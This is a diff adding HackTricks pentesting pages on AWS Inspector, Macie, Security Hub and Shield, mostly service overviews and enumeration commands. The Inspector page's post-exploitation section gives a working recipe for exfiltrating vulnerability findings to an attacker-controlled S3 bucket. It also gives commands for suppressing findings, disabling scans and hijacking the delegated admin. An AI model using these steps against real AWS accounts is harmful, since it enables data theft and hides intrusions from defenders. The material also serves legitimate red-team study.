+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### Inspector + +Amazon Inspector is an advanced, automated vulnerability management service designed to enhance the security of your AWS environment. This service continuously scans Amazon EC2 instances, container images in Amazon ECR, Amazon ECS, and AWS Lambda functions for vulnerabilities and unintended network exposure. By leveraging a robust vulnerability intelligence database, Amazon Inspector provides detailed findings, including severity levels and remediation recommendations, helping organizations proactively identify and address security risks. This comprehensive approach ensures a fortified security posture across various AWS services, aiding in compliance and risk management. + +### Key elements + +#### Findings + +Findings in Amazon Inspector are detailed reports about vulnerabilities and exposures discovered during the scan of EC2 instances, ECR repositories, or Lambda functions. Based on its state, findings are categorized as: + +* **Active**: The finding has not been remediated. +* **Closed**: The finding has been remediated. +* **Suppressed**: The finding has been marked with this state due to one or more **suppression rules**. + +Findings are also categorized into the next three types: + +* **Package**: These findings relate to vulnerabilities in software packages installed on your resources. Examples include outdated libraries or dependencies with known security issues. +* **Code**: This category includes vulnerabilities found in the code of applications running on your AWS resources. Common issues are coding errors or insecure practices that could lead to security breaches. +* **Network**: Network findings identify potential exposures in network configurations that could be exploited by attackers. These include open ports, insecure network protocols, and misconfigured security groups. + +#### Filters and Suppression Rules + +Filters and suppression rules in Amazon Inspector help manage and prioritize findings. 
Filters allow you to refine findings based on specific criteria, such as severity or resource type. Suppression rules allow you to suppress certain findings that are considered low risk, have already been mitigated, or for any other important reason, preventing them from overloading your security reports and allowing you to focus on more critical issues. + +#### Software Bill of Materials (SBOM) + +A Software Bill of Materials (SBOM) in Amazon Inspector is an exportable nested inventory list detailing all the components within a software package, including libraries and dependencies. SBOMs help provide transparency into the software supply chain, enabling better vulnerability management and compliance. They are crucial for identifying and mitigating risks associated with open source and third-party software components. + +### Key features + +#### Export findings + +Amazon Inspector offers the capability to export findings to Amazon S3 Buckets, Amazon EventBridge and AWS Security Hub, which enables you to generate detailed reports of identified vulnerabilities and exposures for further analysis or sharing at a specific date and time. This feature supports various output formats such as CSV and JSON, making it easier to integrate with other tools and systems. The export functionality allows customization of the data included in the reports, enabling you to filter findings based on specific criteria like severity, resource type, or date range and including by default all of your findings in the current AWS Region with an Active status. + +When exporting findings, a Key Management Service (KMS) key is necessary to encrypt the data during export. KMS keys ensure that the exported findings are protected against unauthorized access, providing an extra layer of security for sensitive vulnerability information. + +#### Amazon EC2 instances scanning + +Amazon Inspector offers robust scanning capabilities for Amazon EC2 instances to detect vulnerabilities and security issues. 
Inspector compared extracted metadata from the EC2 instance against rules from security advisories in order to produce package vulnerabilities and network reachability issues. These scans can be performed through **agent-based** or **agentless** methods, depending on the **scan mode** settings configuration of your account. + +* **Agent-Based**: Utilizes the AWS Systems Manager (SSM) agent to perform in-depth scans. This method allows for comprehensive data collection and analysis directly from the instance. +* **Agentless**: Provides a lightweight alternative that does not require installing an agent on the instance, creating an EBS snapshot of every volume of the EC2 instance, looking for vulnerabilities, and then deleting it; leveraging existing AWS infrastructure for scanning. + +The scan mode determines which method will be used to perform EC2 scans: + +* **Agent-Based**: Involves installing the SSM agent on EC2 instances for deep inspection. +* **Hybrid Scanning**: Combines both agent-based and agentless methods to maximize coverage and minimize performance impact. In those EC2 instances where the SSM agent is installed, Inspector will perform an agent-based scan, and for those where there is no SSM agent, the scan performed will be agentless. + +Another important feature is the **deep inspection** for EC2 Linux instances. This feature offers thorough analysis of the software and configuration of EC2 Linux instances, providing detailed vulnerability assessments, including operating system vulnerabilities, application vulnerabilities, and misconfigurations, ensuring a comprehensive security evaluation. This is achieved through the inspection of **custom paths** and all of its sub-directories. 
By default, Amazon Inspector will scan the following, but each member account can define up to 5 more custom paths, and each delegated administrator up to 10: + +* `/usr/lib` +* `/usr/lib64` +* `/usr/local/lib` +* `/usr/local/lib64` + +#### Amazon ECR container images scanning + +Amazon Inspector provides robust scanning capabilities for Amazon Elastic Container Registry (ECR) container images, ensuring that package vulnerabilities are detected and managed efficiently. + +* **Basic Scanning**: This is a quick and lightweight scan that identifies known OS packages vulnerabilities in container images using a standard set of rules from the open-source Clair project. With this scanning configuration, your repositories will be scanned on push, or performing manual scans. +* **Enhanced Scanning**: This option adds the continuous scanning feature in addition to the on push scan. Enhanced scanning dives deeper into the layers of each container image to identify vulnerabilities in OS packages and in programming languages packages with higher accuracy. It analyzes both the base image and any additional layers, providing a comprehensive view of potential security issues. + +#### Amazon Lambda functions scanning + +Amazon Inspector includes comprehensive scanning capabilities for AWS Lambda functions and its layers, ensuring the security and integrity of serverless applications. Inspector offers two types of scanning for Lambda functions: + +* **Lambda standard scanning**: This default feature identifies software vulnerabilities in the application package dependencies added to your Lambda function and layers. For instance, if your function uses a version of a library like python-jwt with a known vulnerability, it generates a finding. +* **Lambda code scanning**: Analyzes custom application code for security issues, detecting vulnerabilities like injection flaws, data leaks, weak cryptography, and missing encryption. 
It captures code snippets highlighting detected vulnerabilities, such as hardcoded credentials. Findings include detailed remediation suggestions and code snippets for fixing the issues. + +#### **Center for Internet Security (CIS) scans** + +Amazon Inspector includes CIS scans to benchmark Amazon EC2 instance operating systems against best practice recommendations from the Center for Internet Security (CIS). These scans ensure configurations adhere to industry-standard security baselines. + +* **Configuration**: CIS scans evaluate if system configurations meet specific CIS Benchmark recommendations, with each check linked to a CIS check ID and title. +* **Execution**: Scans are performed or scheduled based on instance tags and defined schedules. +* **Results**: Post-scan results indicate which checks passed, skipped, or failed, providing insight into the security posture of each instance. + +### Enumeration + +```bash +# Administrator and member accounts # + +## Retrieve information about the AWS Inpsector delegated administrator for your organization (ReadOnlyAccess policy is enough for this) +aws inspector2 get-delegated-admin-account + +## List the members who are associated with the AWS Inspector administrator account (ReadOnlyAccess policy is enough for this) +aws inspector2 list-members [--only-associated | --no-only-associated] +## Retrieve information about a member account (ReadOnlyAccess policy is enough for this) +aws inspector2 get-member --account-id +## Retrieve the status of AWS accounts within your environment (ReadOnlyAccess policy is enough for this) +aws inspector2 batch-get-account-status [--account-ids ] +## Retrieve the free trial status for the specified accounts (ReadOnlyAccess policy is enough for this) +aws inspector2 batch-get-free-trial-info --account-ids +## Retrieve the EC2 Deep Inspection status for the member accounts (Requires to be the delegated administrator) +aws inspector2 batch-get-member-ec2-deep-inspection-status 
[--account-ids ] + +## List an account's permissions associated with AWS Inspector +aws inspector2 list-account-permissions + +# Findings # + +## List a subset of information of the findings for your envionment (ReadOnlyAccess policy is enough for this) +aws inspector2 list-findings +## Retrieve vulnerability intelligence details for the specified findings +aws inspector2 batch-get-finding-details --finding-arns +## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this) +aws inspector2 list-finding-aggregations --aggregation-type [--account-ids ] +## Retrieve code snippet information about one or more specified code vulnerability findings +aws inspector2 batch-get-code-snippet --finding-arns +## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this) +aws inspector2 get-findings-report-status --report-id + +# CIS # + +## List CIS scan configurations (ReadOnlyAccess policy is enough for this) +aws inspector2 list-cis-scan-configurations +## List the completed CIS scans (ReadOnlyAccess policy is enough for this) +aws inspector2 list-cis-scans +## Retrieve a report from a completed CIS scan +aws inspector2 get-cis-scan-report --scan-arn [--target-accounts ] +## Retrieve details about the specific CIS scan over the specified resource +aws inspector2 get-cis-scan-result-details --account-id --scan-arn --target-resource-id +## List CIS scan results broken down by check +aws inspector2 list-cis-scan-results-aggregated-by-checks --scan-arn +## List CIS scan results broken down by target resource +aws inspector2 list-cis-scan-results-aggregated-by-target-resource --scan-arn + +# Configuration # + +## Describe AWS Inspector settings for AWS Organization (ReadOnlyAccess policy is enough for this) +aws inspector2 describe-organization-configuration +## Retrieve the configuration settings about EC2 scan and ECR re-scan +aws inspector2 get-configuration +## Retrieve EC2 Deep Inspection configuration 
associated with your account +aws inspector2 get-ec2-deep-inspection-configuration + +# Miscellaneous # + +## Retrieve the details of a Software Bill of Materials (SBOM) report +aws inspector2 get-sbom-export --report-id + +## Retrieve the coverage details for the specified vulnerabilities +aws inspector2 search-vulnerabilities --filter-criteria + +## Retrieve the tags attached to the specified resource +aws inspector2 list-tags-for-resource --resource-arn + +## Retrieve the AWS KMS key used to encrypt the specified code snippets +aws inspector2 get-encryption-key --resource-type --scan-type + +## List the filters associated to your AWS account +aws inspector2 list-filters + +## List the types of statistics AWS Inspector can generate (ReadOnlyAccess policy is enough for this) +aws inspector2 list-coverage +## Retrieve statistical data and about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this) +aws inspector2 list-coverage-statistics + +## List the aggregated usage total over the last 30 days +aws inspector2 list-usage-totals [--account-ids ] + +### INSPECTOR CLASSIC ### + +## Assessments info, there is a "describe" action for each one to get more info +aws inspector list-assessment-runs +aws inspector list-assessment-targets +aws inspector list-assessment-templates +aws inspector list-event-subscriptions + +## Get findings +aws inspector list-findings + +## Get exclusions +aws inspector list-exclusions --assessment-run-arn + +## Rule packages +aws inspector list-rules-packages +``` + +### Post Exploitation + +{% hint style="success" %} +From an attackers perspective, this service can help the attacker to find vulnerabilities and network exposures that could help him to compromise other instances/containers. + +However, an attacker could also be interested in disrupting this service so the victim cannot see vulnerabilities (all or specific ones). 
+{% endhint %} + +#### `inspector2:CreateFindingsReport`, `inspector2:CreateSBOMReport` + +An attacker could generate detailed reports of vulnerabilities or software bill of materials (SBOMs) and exfiltrate them from your AWS environment. This information could be exploited to identify specific weaknesses, outdated software, or insecure dependencies, enabling targeted attacks. + +```bash +# Findings report +aws inspector2 create-findings-report --report-format --s3-destination [--filter-criteria ] +# SBOM report +aws inspector2 create-sbom-report --report-format --s3-destination [--resource-filter-criteria ] +``` + +The following example shows how to exfiltrate all the Active findings from Amazon Inspector to an attacker controlled Amazon S3 Bucket with an attacker controlled Amazon KMS key: + +1. **Create an Amazon S3 Bucket** and attach a policy to it in order to be accessible from the victim Amazon Inspector: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "allow-inspector", + "Effect": "Allow", + "Principal": { + "Service": "inspector2.amazonaws.com" + }, + "Action": [ + "s3:PutObject", + "s3:PutObjectAcl", + "s3:AbortMultipartUpload" + ], + "Resource": "arn:aws:s3:::inspector-findings/*", + "Condition": { + "StringEquals": { + "aws:SourceAccount": "" + }, + "ArnLike": { + "aws:SourceArn": "arn:aws:inspector2:us-east-1::report/*" + } + } + } + ] +} +``` + +2. **Create an Amazon KMS key** and attach a policy to it in order to be usable by the victim’s Amazon Inspector: + +```json +{ + "Version": "2012-10-17", + "Id": "key-policy", + "Statement": [ + { + ... + }, + { + "Sid": "Allow victim Amazon Inspector to use the key", + "Effect": "Allow", + "Principal": { + "Service": "inspector2.amazonaws.com" + }, + "Action": [ + "kms:Encrypt", + "kms:Decrypt", + "kms:ReEncrypt*", + "kms:GenerateDataKey*", + "kms:DescribeKey" + ], + "Resource": "*", + "Condition": { + "StringEquals": { + "aws:SourceAccount": "" + } + } + } + ] +} +``` + +3. 
Execute the command to **create the findings report** exfiltrating it: + +```bash +aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f +``` + +* **Potential Impact**: Generation and exfiltration of detailed vulnerability and software reports, gaining insights into specific vulnerabilities and security weaknesses. + +#### `inspector2:CancelFindingsReport`, `inspector2:CancelSbomExport` + +An attacker could cancel the generation of the specified findings report or SBOM report, preventing security teams from receiving timely information about vulnerabilities and software bill of materials (SBOMs), delaying the detection and remediation of security issues. + +```bash +# Cancel findings report generation +aws inspector2 cancel-findings-report --report-id +# Cancel SBOM report generatiom +aws inspector2 cancel-sbom-export --report-id +``` + +* **Potential Impact**: Disruption of security monitoring and prevention of timely detection and remediation of security issues. + +#### `inspector2:CreateFilter`, `inspector2:UpdateFilter`, `inspector2:DeleteFilter` + +An attacker with these permissions would be able manipulate the filtering rules that determine which vulnerabilities and security issues are reported or suppressed (if the **action** is set to SUPPRESS, a suppression rule would be created). This could hide critical vulnerabilities from security administrators, making it easier to exploit these weaknesses without detection. By altering or removing important filters, an attacker could also create noise by flooding the system with irrelevant findings, hindering effective security monitoring and response. 
+ +```bash +# Create +aws inspector2 create-filter --action --filter-criteria --name [--reason ] +# Update +aws inspector2 update-filter --filter-arn [--action ] [--filter-criteria ] [--reason ] +# Delete +aws inspector2 delete-filter --arn +``` + +* **Potential Impact**: Concealment or suppression of critical vulnerabilities, or flooding the system with irrelevant findings. + +#### `inspector2:DisableDelegatedAdminAccount`, (`inspector2:EnableDelegatedAdminAccount` & `organizations:ListDelegatedAdministrators` & `organizations:EnableAWSServiceAccess` & `iam:CreateServiceLinkedRole`) + +An attacker could significantly disrupt the security management structure. + +* Disabling the delegated admin account, the attacker could prevent the security team from accessing and managing Amazon Inspector settings and reports. +* Enabling an unauthorized admin account would allow an attacker to control security configurations, potentially disabling scans or modifying settings to hide malicious activities. + +{% hint style="warning" %} +It is required for the unauthorized account to be in the same Organization as the victim in order to become the delegated administrator. + +In order for the unauthorized account to become the delegated administrator, it is also required that after the legitimate delegated administrator is disabled, and before the unauthorized account is enabled as the delegated administrator, the legitimate administrator must be deregistered as the delegated administrator from the organization. . 
This can be done with the following command (**`organizations:DeregisterDelegatedAdministrator`** permission required): **`aws organizations deregister-delegated-administrator --account-id --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`** +{% endhint %} + +```bash +# Disable +aws inspector2 disable-delegated-admin-account --delegated-admin-account-id +# Enable +aws inspector2 enable-delegated-admin-account --delegated-admin-account-id +``` + +* **Potential Impact**: Disruption of the security management. + +#### `inspector2:AssociateMember`, `inspector2:DisassociateMember` + +An attacker could manipulate the association of member accounts within an Amazon Inspector organization. By associating unauthorized accounts or disassociating legitimate ones, an attacker could control which accounts are included in security scans and reporting. This could lead to critical accounts being excluded from security monitoring, enabling the attacker to exploit vulnerabilities in those accounts without detection. + +{% hint style="warning" %} +This action requires to be performed by the delegated administrator. +{% endhint %} + +```bash +# Associate +aws inspector2 associate-member --account-id +# Disassociate +aws inspector2 disassociate-member --account-id +``` + +* **Potential Impact**: Exclusion of key accounts from security scans, enabling undetected exploitation of vulnerabilities. + +#### `inspector2:Disable`, (`inspector2:Enable` & `iam:CreateServiceLinkedRole`) + +An attacker with the `inspector2:Disable` permission would be able to disable security scans on specific resource types (EC2, ECR, Lambda, Lambda code) over the specified accounts, leaving parts of the AWS environment unmonitored and vulnerable to attacks. In addition, owing the **`inspector2:Enable`** & **`iam:CreateServiceLinkedRole`** permissions, an attacker could then re-enable scans selectively to avoid detection of suspicious configurations. 
+ +{% hint style="warning" %} +This action requires to be performed by the delegated administrator. +{% endhint %} + +```bash +# Disable +aws inspector2 disable --account-ids [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>] +# Enable +aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids ] +``` + +* **Potential Impact**: Creation of blind spots in the security monitoring. + +#### `inspector2:UpdateOrganizationConfiguration` + +An attacker with this permission would be able to update the configurations for your Amazon Inspector organization, affecting the default scanning features enabled for new member accounts. + +{% hint style="warning" %} +This action requires to be performed by the delegated administrator. +{% endhint %} + +```bash +aws inspector2 update-organization-configuration --auto-enable +``` + +* **Potential Impact**: Alter security scan policies and configurations for the organization. + +#### `inspector2:TagResource`, `inspector2:UntagResource` + +An attacker could manipulate tags on AWS Inspector resources, which are critical for organizing, tracking, and automating security assessments. By altering or removing tags, an attacker could potentially hide vulnerabilities from security scans, disrupt compliance reporting, and interfere with automated remediation processes, leading to unchecked security issues and compromised system integrity. + +```bash +aws inspector2 tag-resource --resource-arn --tags +aws inspector2 untag-resource --resource-arn --tag-keys +``` + +* **Potential Impact**: Hiding of vulnerabilities, disruption of compliance reporting, disruption of security automation and disruption of cost allocation. 
+ +## References + +* [https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html](https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html) +* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_amazoninspector2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md new file mode 100644 index 0000000000..6667dcf6ba --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md @@ -0,0 +1,145 @@ +# AWS - Macie Enum + +## AWS - Macie Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Macie + +Amazon Macie stands out as a service designed to **automatically detect, classify, and identify data** within an AWS account. It leverages **machine learning** to continuously monitor and analyze data, primarily focusing on detecting and alerting against unusual or suspicious activities by examining **cloud trail event** data and user behavior patterns. + +Key Features of Amazon Macie: + +1. **Active Data Review**: Employs machine learning to review data actively as various actions occur within the AWS account. +2. **Anomaly Detection**: Identifies irregular activities or access patterns, generating alerts to mitigate potential data exposure risks. +3. **Continuous Monitoring**: Automatically monitors and detects new data in Amazon S3, employing machine learning and artificial intelligence to adapt to data access patterns over time. +4. **Data Classification with NLP**: Utilizes natural language processing (NLP) to classify and interpret different data types, assigning risk scores to prioritize findings. +5. **Security Monitoring**: Identifies security-sensitive data, including API keys, secret keys, and personal information, helping to prevent data leaks. + +Amazon Macie is a **regional service** and requires the 'AWSMacieServiceCustomerSetupRole' IAM Role and an enabled AWS CloudTrail for functionality. + +### Alert System + +Macie categorizes alerts into predefined categories like: + +* Anonymized access +* Data compliance +* Credential Loss +* Privilege escalation +* Ransomware +* Suspicious access, etc. + +These alerts provide detailed descriptions and result breakdowns for effective response and resolution. + +### Dashboard Features + +The dashboard categorizes data into various sections, including: + +* S3 Objects (by time range, ACL, PII) +* High-risk CloudTrail events/users +* Activity Locations +* CloudTrail user identity types, and more. 
+ +### User Categorization + +Users are classified into tiers based on the risk level of their API calls: + +* **Platinum**: High-risk API calls, often with admin privileges. +* **Gold**: Infrastructure-related API calls. +* **Silver**: Medium-risk API calls. +* **Bronze**: Low-risk API calls. + +### Identity Types + +Identity types include Root, IAM user, Assumed Role, Federated User, AWS Account, and AWS Service, indicating the source of requests. + +### Data Classification + +Data classification encompasses: + +* Content-Type: Based on detected content type. +* File Extension: Based on file extension. +* Theme: Categorized by keywords within files. +* Regex: Categorized based on specific regex patterns. + +The highest risk among these categories determines the file's final risk level. + +### Research and Analysis + +Amazon Macie's research function allows for custom queries across all Macie data for in-depth analysis. Filters include CloudTrail Data, S3 Bucket properties, and S3 Objects. Moreover, it supports inviting other accounts to share Amazon Macie, facilitating collaborative data management and security monitoring. 
+ +### Enumeration + +``` +# Get buckets +aws macie2 describe-buckets + +# Org config +aws macie2 describe-organization-configuration + +# Get admin account (if any) +aws macie2 get-administrator-account +aws macie2 list-organization-admin-accounts # Run from the management account of the org + +# Get macie account members (run this form the admin account) +aws macie2 list-members + +# Check if automated sensitive data discovey is enabled +aws macie2 get-automated-discovery-configuration + +# Get findings +aws macie2 list-findings +aws macie2 get-findings --finding-ids +aws macie2 list-findings-filters +aws macie2 get -findings-filters --id + +# Get allow lists +aws macie2 list-allow-lists +aws macie2 get-allow-list --id + +# Get different info +aws macie2 list-classification-jobs +aws macie2 list-classification-scopes +aws macie2 list-custom-data-identifiers +``` + +#### Post Exploitation + +{% hint style="success" %} +From an attackers perspective, this service isn't made to detect the attacker, but to detect sensitive information in the stored files. Therefore, this service might **help an attacker to find sensitive info** inside the buckets.\ +However, maybe an attacker could also be interested in disrupting it in order to prevent the victim from getting alerts and steal that info easier. +{% endhint %} + +TODO: PRs are welcome! + +## References + +* [https://cloudacademy.com/blog/introducing-aws-security-hub/](https://cloudacademy.com/blog/introducing-aws-security-hub/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md new file mode 100644 index 0000000000..ec054c188e --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md @@ -0,0 +1,89 @@ +# AWS - Security Hub Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Security Hub + +**Security Hub** collects security **data** from **across AWS accounts**, services, and supported third-party partner products and helps you **analyze your security** trends and identify the highest priority security issues. + +It **centralizes security related alerts across accounts**, and provides a UI for viewing these. The biggest limitation is it **does not centralize alerts across regions**, only across accounts + +**Characteristics** + +* Regional (findings don't cross regions) +* Multi-account support +* Findings from: + * Guard Duty + * Config + * Inspector + * Macie + * third party + * self-generated against CIS standards + +## Enumeration + +``` +# Get basic info +aws securityhub describe-hub + +# Get securityhub org config +aws securityhub describe-organization-configuration #If the current account isn't the security hub admin, you will get an error + +# Get the configured admin for securityhub +aws securityhub get-administrator-account +aws securityhub get-master-account # Another way +aws securityhub list-organization-admin-accounts # Another way + +# Get enabled standards +aws securityhub get-enabled-standards + +# Get the findings +aws securityhub get-findings + +# Get insights +aws securityhub get-insights + +# Get Automation rules (must be from the admin account) +aws securityhub list-automation-rules + +# Get members (must be from the admin account) +aws securityhub list-members +aws securityhub get-members --account-ids +``` + +## Bypass Detection + +TODO, PRs accepted + +## References + +* [https://cloudsecdocs.com/aws/services/logging/other/#general-info](https://cloudsecdocs.com/aws/services/logging/other/#general-info) +* [https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html](https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert 
(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md new file mode 100644 index 0000000000..b6ee0fa3ad --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md @@ -0,0 +1,41 @@ +# AWS - Shield Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Shield + +AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. + +**AWS Shield Standard** is **free** to everyone, and it offers **DDoS protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. + +**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**. + +Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.** + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md new file mode 100644 index 0000000000..518251fd64 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md @@ -0,0 +1,97 @@ +# AWS - Trusted Advisor Enum + +## AWS - Trusted Advisor Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
